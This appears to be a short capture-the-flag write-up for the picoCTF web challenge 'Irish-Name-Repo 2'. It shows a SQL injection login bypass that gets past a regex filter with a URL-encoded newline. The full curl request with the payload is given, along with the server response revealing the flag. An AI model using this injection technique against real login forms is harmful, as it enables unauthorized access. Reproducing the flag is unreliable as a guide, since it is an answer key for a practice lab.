Categories: web

Irish-Name-Repo 2 - 350 points


There is a website running at (link). Someone has bypassed the login before, and now it’s being strengthened. Try to see if you can still login! or




Okay, so we already know that the vulnerability is SQL injection from the last challenge. We try to inject simple payloads like ' OR 1=1 -- but there seems to be some kind of filter in place.

After messing around I realized that the filter behaves like regular expressions and realized that they might terminate at a newline.

So, I made a request with a newline before my payload:

curl '' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6  Sicherheits-Erg\xe4nzungsupdate) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Cookie: jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiJz5cIj48aDE-aGk8L2gxPiJ9.5TyqQ5kcsGZB2MeWCkp6wRPvl3TfqQ_Pk83Dcv2kNbA' -H 'Upgrade-Insecure-Requests: 1' --data 'username=%27%0A or 1=1--&password=&debug=0'

I got this response:

<h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_c9c1c726}</p>

Nice, an easy start to this CTF.